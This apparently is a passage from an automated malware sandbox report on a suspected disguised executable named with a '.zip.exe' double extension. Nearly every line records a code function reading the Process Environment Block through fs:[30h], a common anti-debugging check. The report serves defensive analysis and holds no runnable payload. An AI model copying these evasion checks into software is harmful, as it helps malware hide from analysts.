                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exeCode function: 4_2_018701F8 mov eax, dword ptr fs:[00000030h]4_2_018701F8
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exeCode function: 4_2_018EE10E mov eax, dword ptr fs:[00000030h]4_2_018EE10E
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exeCode function: 4_2_018EE10E mov ecx, dword ptr fs:[00000030h]4_2_018EE10E
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exeCode function: 4_2_018EE10E mov eax, dword ptr fs:[00000030h]4_2_018EE10E
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exeCode function: 4_2_018EE10E mov eax, dword ptr fs:[00000030h]4_2_018EE10E
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exeCode function: 4_2_018EE10E mov ecx, dword ptr fs:[00000030h]4_2_018EE10E
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exeCode function: 4_2_018EE10E mov eax, dword ptr fs:[00000030h]4_2_018EE10E
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exeCode function: 4_2_018EE10E mov eax, dword ptr fs:[00000030h]4_2_018EE10E
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exeCode function: 4_2_018EE10E mov ecx, dword ptr fs:[00000030h]4_2_018EE10E
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exeCode function: 4_2_018EE10E mov eax, dword ptr fs:[00000030h]4_2_018EE10E
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exeCode function: 4_2_018EE10E mov ecx, dword ptr fs:[00000030h]4_2_018EE10E
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exeCode function: 4_2_01900115 mov eax, dword ptr fs:[00000030h]4_2_01900115
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exeCode function: 4_2_018EA118 mov ecx, dword ptr fs:[00000030h]4_2_018EA118
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exeCode function: 4_2_018EA118 mov eax, dword ptr fs:[00000030h]4_2_018EA118
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exeCode function: 4_2_018EA118 mov eax, dword ptr fs:[00000030h]4_2_018EA118
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exeCode function: 4_2_018EA118 mov eax, dword ptr fs:[00000030h]4_2_018EA118
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exeCode function: 4_2_01870124 mov eax, dword ptr fs:[00000030h]4_2_01870124
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exeCode function: 4_2_018D4144 mov eax, dword ptr fs:[00000030h]4_2_018D4144
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exeCode function: 4_2_018D4144 mov eax, dword ptr fs:[00000030h]4_2_018D4144
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exeCode function: 4_2_018D4144 mov ecx, dword ptr fs:[00000030h]4_2_018D4144
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exeCode function: 4_2_018D4144 mov eax, dword ptr fs:[00000030h]4_2_018D4144
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exeCode function: 4_2_018D4144 mov eax, dword ptr fs:[00000030h]4_2_018D4144
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exeCode function: 4_2_01846154 mov eax, dword ptr fs:[00000030h]4_2_01846154
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exeCode function: 4_2_01846154 mov eax, dword ptr fs:[00000030h]4_2_01846154
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exeCode function: 4_2_0183C156 mov eax, dword ptr fs:[00000030h]4_2_0183C156
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exeCode function: 4_2_018D8158 mov eax, dword ptr fs:[00000030h]4_2_018D8158
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exeCode function: 4_2_01914164 mov eax, dword ptr fs:[00000030h]4_2_01914164
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exeCode function: 4_2_01914164 mov eax, dword ptr fs:[00000030h]4_2_01914164
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exeCode function: 4_2_0184208A mov eax, dword ptr fs:[00000030h]4_2_0184208A
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exeCode function: 4_2_018380A0 mov eax, dword ptr fs:[00000030h]4_2_018380A0
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exeCode function: 4_2_018D80A8 mov eax, dword ptr fs:[00000030h]4_2_018D80A8
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exeCode function: 4_2_019060B8 mov eax, dword ptr fs:[00000030h]4_2_019060B8
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exeCode function: 4_2_019060B8 mov ecx, dword ptr fs:[00000030h]4_2_019060B8
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exeCode function: 4_2_018C20DE mov eax, dword ptr fs:[00000030h]4_2_018C20DE
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exeCode function: 4_2_0183A0E3 mov ecx, dword ptr fs:[00000030h]4_2_0183A0E3
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exeCode function: 4_2_018C60E0 mov eax, dword ptr fs:[00000030h]4_2_018C60E0
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exeCode function: 4_2_018480E9 mov eax, dword ptr fs:[00000030h]4_2_018480E9
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exeCode function: 4_2_0183C0F0 mov eax, dword ptr fs:[00000030h]4_2_0183C0F0
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exeCode function: 4_2_018820F0 mov ecx, dword ptr fs:[00000030h]4_2_018820F0
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exeCode function: 4_2_018C4000 mov ecx, dword ptr fs:[00000030h]4_2_018C4000
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exeCode function: 4_2_018E2000 mov eax, dword ptr fs:[00000030h]4_2_018E2000
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exeCode function: 4_2_018E2000 mov eax, dword ptr fs:[00000030h]4_2_018E2000
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exeCode function: 4_2_018E2000 mov eax, dword ptr fs:[00000030h]4_2_018E2000
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exeCode function: 4_2_018E2000 mov eax, dword ptr fs:[00000030h]4_2_018E2000
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exeCode function: 4_2_018E2000 mov eax, dword ptr fs:[00000030h]4_2_018E2000
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exeCode function: 4_2_018E2000 mov eax, dword ptr fs:[00000030h]4_2_018E2000
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exeCode function: 4_2_018E2000 mov eax, dword ptr fs:[00000030h]4_2_018E2000
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exeCode function: 4_2_018E2000 mov eax, dword ptr fs:[00000030h]4_2_018E2000
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exeCode function: 4_2_0185E016 mov eax, dword ptr fs:[00000030h]4_2_0185E016
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exeCode function: 4_2_0185E016 mov eax, dword ptr fs:[00000030h]4_2_0185E016
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exeCode function: 4_2_0185E016 mov eax, dword ptr fs:[00000030h]4_2_0185E016
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exeCode function: 4_2_0185E016 mov eax, dword ptr fs:[00000030h]4_2_0185E016
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exeCode function: 4_2_0183A020 mov eax, dword ptr fs:[00000030h]4_2_0183A020
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exeCode function: 4_2_0183C020 mov eax, dword ptr fs:[00000030h]4_2_0183C020
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exeCode function: 4_2_018D6030 mov eax, dword ptr fs:[00000030h]4_2_018D6030
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exeCode function: 4_2_01842050 mov eax, dword ptr fs:[00000030h]4_2_01842050
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exeCode function: 4_2_018C6050 mov eax, dword ptr fs:[00000030h]4_2_018C6050
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exeCode function: 4_2_0186C073 mov eax, dword ptr fs:[00000030h]4_2_0186C073
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exeCode function: 4_2_0186438F mov eax, dword ptr fs:[00000030h]4_2_0186438F
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exeCode function: 4_2_0186438F mov eax, dword ptr fs:[00000030h]4_2_0186438F
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exeCode function: 4_2_0183E388 mov eax, dword ptr fs:[00000030h]4_2_0183E388
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exeCode function: 4_2_0183E388 mov eax, dword ptr fs:[00000030h]4_2_0183E388
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exeCode function: 4_2_0183E388 mov eax, dword ptr fs:[00000030h]4_2_0183E388
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exeCode function: 4_2_01838397 mov eax, dword ptr fs:[00000030h]4_2_01838397
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exeCode function: 4_2_01838397 mov eax, dword ptr fs:[00000030h]4_2_01838397
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exeCode function: 4_2_01838397 mov eax, dword ptr fs:[00000030h]4_2_01838397
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exeCode function: 4_2_018FC3CD mov eax, dword ptr fs:[00000030h]4_2_018FC3CD
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exeCode function: 4_2_0184A3C0 mov eax, dword ptr fs:[00000030h]4_2_0184A3C0
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exeCode function: 4_2_0184A3C0 mov eax, dword ptr fs:[00000030h]4_2_0184A3C0
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exeCode function: 4_2_0184A3C0 mov eax, dword ptr fs:[00000030h]4_2_0184A3C0
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exeCode function: 4_2_0184A3C0 mov eax, dword ptr fs:[00000030h]4_2_0184A3C0
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exeCode function: 4_2_0184A3C0 mov eax, dword ptr fs:[00000030h]4_2_0184A3C0
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exeCode function: 4_2_0184A3C0 mov eax, dword ptr fs:[00000030h]4_2_0184A3C0
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exeCode function: 4_2_018483C0 mov eax, dword ptr fs:[00000030h]4_2_018483C0
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exeCode function: 4_2_018483C0 mov eax, dword ptr fs:[00000030h]4_2_018483C0
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exeCode function: 4_2_018483C0 mov eax, dword ptr fs:[00000030h]4_2_018483C0
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exeCode function: 4_2_018483C0 mov eax, dword ptr fs:[00000030h]4_2_018483C0
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exeCode function: 4_2_018C63C0 mov eax, dword ptr fs:[00000030h]4_2_018C63C0
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exeCode function: 4_2_018EE3DB mov eax, dword ptr fs:[00000030h]4_2_018EE3DB
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exeCode function: 4_2_018EE3DB mov eax, dword ptr fs:[00000030h]4_2_018EE3DB
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exeCode function: 4_2_018EE3DB mov ecx, dword ptr fs:[00000030h]4_2_018EE3DB
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exeCode function: 4_2_018EE3DB mov eax, dword ptr fs:[00000030h]4_2_018EE3DB
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exeCode function: 4_2_018E43D4 mov eax, dword ptr fs:[00000030h]4_2_018E43D4
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exeCode function: 4_2_018E43D4 mov eax, dword ptr fs:[00000030h]4_2_018E43D4
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exeCode function: 4_2_018503E9 mov eax, dword ptr fs:[00000030h]4_2_018503E9
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exeCode function: 4_2_018503E9 mov eax, dword ptr fs:[00000030h]4_2_018503E9
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exeCode function: 4_2_018503E9 mov eax, dword ptr fs:[00000030h]4_2_018503E9
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exeCode function: 4_2_018503E9 mov eax, dword ptr fs:[00000030h]4_2_018503E9
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exeCode function: 4_2_018503E9 mov eax, dword ptr fs:[00000030h]4_2_018503E9
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exeCode function: 4_2_018503E9 mov eax, dword ptr fs:[00000030h]4_2_018503E9
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exeCode function: 4_2_018503E9 mov eax, dword ptr fs:[00000030h]4_2_018503E9
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exeCode function: 4_2_018503E9 mov eax, dword ptr fs:[00000030h]4_2_018503E9
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exeCode function: 4_2_0185E3F0 mov eax, dword ptr fs:[00000030h]4_2_0185E3F0
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exeCode function: 4_2_0185E3F0 mov eax, dword ptr fs:[00000030h]4_2_0185E3F0
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exeCode function: 4_2_0185E3F0 mov eax, dword ptr fs:[00000030h]4_2_0185E3F0
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exeCode function: 4_2_018763FF mov eax, dword ptr fs:[00000030h]4_2_018763FF
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exeCode function: 4_2_0187A30B mov eax, dword ptr fs:[00000030h]4_2_0187A30B
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exeCode function: 4_2_0187A30B mov eax, dword ptr fs:[00000030h]4_2_0187A30B
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exeCode function: 4_2_0187A30B mov eax, dword ptr fs:[00000030h]4_2_0187A30B
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exeCode function: 4_2_0183C310 mov ecx, dword ptr fs:[00000030h]4_2_0183C310
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exeCode function: 4_2_01860310 mov ecx, dword ptr fs:[00000030h]4_2_01860310
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exeCode function: 4_2_01918324 mov eax, dword ptr fs:[00000030h]4_2_01918324
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exeCode function: 4_2_01918324 mov ecx, dword ptr fs:[00000030h]4_2_01918324
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exeCode function: 4_2_01918324 mov eax, dword ptr fs:[00000030h]4_2_01918324
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exeCode function: 4_2_01918324 mov eax, dword ptr fs:[00000030h]4_2_01918324
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exeCode function: 4_2_0190A352 mov eax, dword ptr fs:[00000030h]4_2_0190A352
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exeCode function: 4_2_018C2349 mov eax, dword ptr fs:[00000030h]4_2_018C2349
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exeCode function: 4_2_018C2349 mov eax, dword ptr fs:[00000030h]4_2_018C2349
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exeCode function: 4_2_018C2349 mov eax, dword ptr fs:[00000030h]4_2_018C2349
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exeCode function: 4_2_018C2349 mov eax, dword ptr fs:[00000030h]4_2_018C2349
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exeCode function: 4_2_018C2349 mov eax, dword ptr fs:[00000030h]4_2_018C2349
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exeCode function: 4_2_018C2349 mov eax, dword ptr fs:[00000030h]4_2_018C2349
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exeCode function: 4_2_018C2349 mov eax, dword ptr fs:[00000030h]4_2_018C2349
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exeCode function: 4_2_018C2349 mov eax, dword ptr fs:[00000030h]4_2_018C2349
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exeCode function: 4_2_018C2349 mov eax, dword ptr fs:[00000030h]4_2_018C2349
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exeCode function: 4_2_018C2349 mov eax, dword ptr fs:[00000030h]4_2_018C2349
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exeCode function: 4_2_018C2349 mov eax, dword ptr fs:[00000030h]4_2_018C2349
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exeCode function: 4_2_018C2349 mov eax, dword ptr fs:[00000030h]4_2_018C2349
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exeCode function: 4_2_018C2349 mov eax, dword ptr fs:[00000030h]4_2_018C2349
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exeCode function: 4_2_018C2349 mov eax, dword ptr fs:[00000030h]4_2_018C2349
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exeCode function: 4_2_018C2349 mov eax, dword ptr fs:[00000030h]4_2_018C2349
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exeCode function: 4_2_018C035C mov eax, dword ptr fs:[00000030h]4_2_018C035C
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exeCode function: 4_2_018C035C mov eax, dword ptr fs:[00000030h]4_2_018C035C
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exeCode function: 4_2_018C035C mov eax, dword ptr fs:[00000030h]4_2_018C035C
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exeCode function: 4_2_018C035C mov ecx, dword ptr fs:[00000030h]4_2_018C035C
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exeCode function: 4_2_018C035C mov eax, dword ptr fs:[00000030h]4_2_018C035C
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exeCode function: 4_2_018C035C mov eax, dword ptr fs:[00000030h]4_2_018C035C
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exeCode function: 4_2_018E8350 mov ecx, dword ptr fs:[00000030h]4_2_018E8350
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exeCode function: 4_2_0191634F mov eax, dword ptr fs:[00000030h]4_2_0191634F
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exeCode function: 4_2_018E437C mov eax, dword ptr fs:[00000030h]4_2_018E437C
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exeCode function: 4_2_0187E284 mov eax, dword ptr fs:[00000030h]4_2_0187E284
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exeCode function: 4_2_0187E284 mov eax, dword ptr fs:[00000030h]4_2_0187E284
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exeCode function: 4_2_018C0283 mov eax, dword ptr fs:[00000030h]4_2_018C0283
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exeCode function: 4_2_018C0283 mov eax, dword ptr fs:[00000030h]4_2_018C0283
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exeCode function: 4_2_018C0283 mov eax, dword ptr fs:[00000030h]4_2_018C0283
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exeCode function: 4_2_018D62A0 mov eax, dword ptr fs:[00000030h]4_2_018D62A0
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exeCode function: 4_2_018D62A0 mov ecx, dword ptr fs:[00000030h]4_2_018D62A0
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exeCode function: 4_2_018D62A0 mov eax, dword ptr fs:[00000030h]4_2_018D62A0
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exeCode function: 4_2_018D62A0 mov eax, dword ptr fs:[00000030h]4_2_018D62A0
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exeCode function: 4_2_018D62A0 mov eax, dword ptr fs:[00000030h]4_2_018D62A0
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exeCode function: 4_2_018D62A0 mov eax, dword ptr fs:[00000030h]4_2_018D62A0
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exeCode function: 4_2_0184A2C3 mov eax, dword ptr fs:[00000030h]4_2_0184A2C3
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exeCode function: 4_2_0184A2C3 mov eax, dword ptr fs:[00000030h]4_2_0184A2C3
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exeCode function: 4_2_0184A2C3 mov eax, dword ptr fs:[00000030h]4_2_0184A2C3
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exeCode function: 4_2_0184A2C3 mov eax, dword ptr fs:[00000030h]4_2_0184A2C3
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exeCode function: 4_2_0184A2C3 mov eax, dword ptr fs:[00000030h]4_2_0184A2C3
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exeCode function: 4_2_019162D6 mov eax, dword ptr fs:[00000030h]4_2_019162D6
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exeCode function: 4_2_018502E1 mov eax, dword ptr fs:[00000030h]4_2_018502E1
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exeCode function: 4_2_018502E1 mov eax, dword ptr fs:[00000030h]4_2_018502E1
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exeCode function: 4_2_018502E1 mov eax, dword ptr fs:[00000030h]4_2_018502E1
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exeCode function: 4_2_0183823B mov eax, dword ptr fs:[00000030h]4_2_0183823B
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exeCode function: 4_2_0191625D mov eax, dword ptr fs:[00000030h]4_2_0191625D
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exeCode function: 4_2_018C8243 mov eax, dword ptr fs:[00000030h]4_2_018C8243
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exeCode function: 4_2_018C8243 mov ecx, dword ptr fs:[00000030h]4_2_018C8243
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exeCode function: 4_2_0183A250 mov eax, dword ptr fs:[00000030h]4_2_0183A250
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exeCode function: 4_2_01846259 mov eax, dword ptr fs:[00000030h]4_2_01846259
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exeCode function: 4_2_018FA250 mov eax, dword ptr fs:[00000030h]4_2_018FA250
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exeCode function: 4_2_018FA250 mov eax, dword ptr fs:[00000030h]4_2_018FA250
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exeCode function: 4_2_01844260 mov eax, dword ptr fs:[00000030h]4_2_01844260
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exeCode function: 4_2_01844260 mov eax, dword ptr fs:[00000030h]4_2_01844260
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exeCode function: 4_2_01844260 mov eax, dword ptr fs:[00000030h]4_2_01844260
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exeCode function: 4_2_0183826B mov eax, dword ptr fs:[00000030h]4_2_0183826B
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exeCode function: 4_2_018F0274 mov eax, dword ptr fs:[00000030h]4_2_018F0274
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exeCode function: 4_2_018F0274 mov eax, dword ptr fs:[00000030h]4_2_018F0274
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exeCode function: 4_2_018F0274 mov eax, dword ptr fs:[00000030h]4_2_018F0274
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exeCode function: 4_2_018F0274 mov eax, dword ptr fs:[00000030h]4_2_018F0274
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exeCode function: 4_2_018F0274 mov eax, dword ptr fs:[00000030h]4_2_018F0274
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exeCode function: 4_2_018F0274 mov eax, dword ptr fs:[00000030h]4_2_018F0274
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exeCode function: 4_2_018F0274 mov eax, dword ptr fs:[00000030h]4_2_018F0274
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exeCode function: 4_2_018F0274 mov eax, dword ptr fs:[00000030h]4_2_018F0274
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exeCode function: 4_2_018F0274 mov eax, dword ptr fs:[00000030h]4_2_018F0274
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exeCode function: 4_2_018F0274 mov eax, dword ptr fs:[00000030h]4_2_018F0274
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exeCode function: 4_2_018F0274 mov eax, dword ptr fs:[00000030h]4_2_018F0274
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exeCode function: 4_2_018F0274 mov eax, dword ptr fs:[00000030h]4_2_018F0274
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exeCode function: 4_2_01842582 mov eax, dword ptr fs:[00000030h]4_2_01842582
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exeCode function: 4_2_01842582 mov ecx, dword ptr fs:[00000030h]4_2_01842582
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exeCode function: 4_2_01874588 mov eax, dword ptr fs:[00000030h]4_2_01874588
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exeCode function: 4_2_0187E59C mov eax, dword ptr fs:[00000030h]4_2_0187E59C
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exeCode function: 4_2_018C05A7 mov eax, dword ptr fs:[00000030h]4_2_018C05A7
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exeCode function: 4_2_018C05A7 mov eax, dword ptr fs:[00000030h]4_2_018C05A7
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exeCode function: 4_2_018C05A7 mov eax, dword ptr fs:[00000030h]4_2_018C05A7
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exeCode function: 4_2_018645B1 mov eax, dword ptr fs:[00000030h]4_2_018645B1
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exeCode function: 4_2_018645B1 mov eax, dword ptr fs:[00000030h]4_2_018645B1
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exeCode function: 4_2_0187E5CF mov eax, dword ptr fs:[00000030h]4_2_0187E5CF
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exeCode function: 4_2_0187E5CF mov eax, dword ptr fs:[00000030h]4_2_0187E5CF
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exeCode function: 4_2_018465D0 mov eax, dword ptr fs:[00000030h]4_2_018465D0
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exeCode function: 4_2_0187A5D0 mov eax, dword ptr fs:[00000030h]4_2_0187A5D0
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exeCode function: 4_2_0187A5D0 mov eax, dword ptr fs:[00000030h]4_2_0187A5D0
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exeCode function: 4_2_0186E5E7 mov eax, dword ptr fs:[00000030h]4_2_0186E5E7
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exeCode function: 4_2_0186E5E7 mov eax, dword ptr fs:[00000030h]4_2_0186E5E7
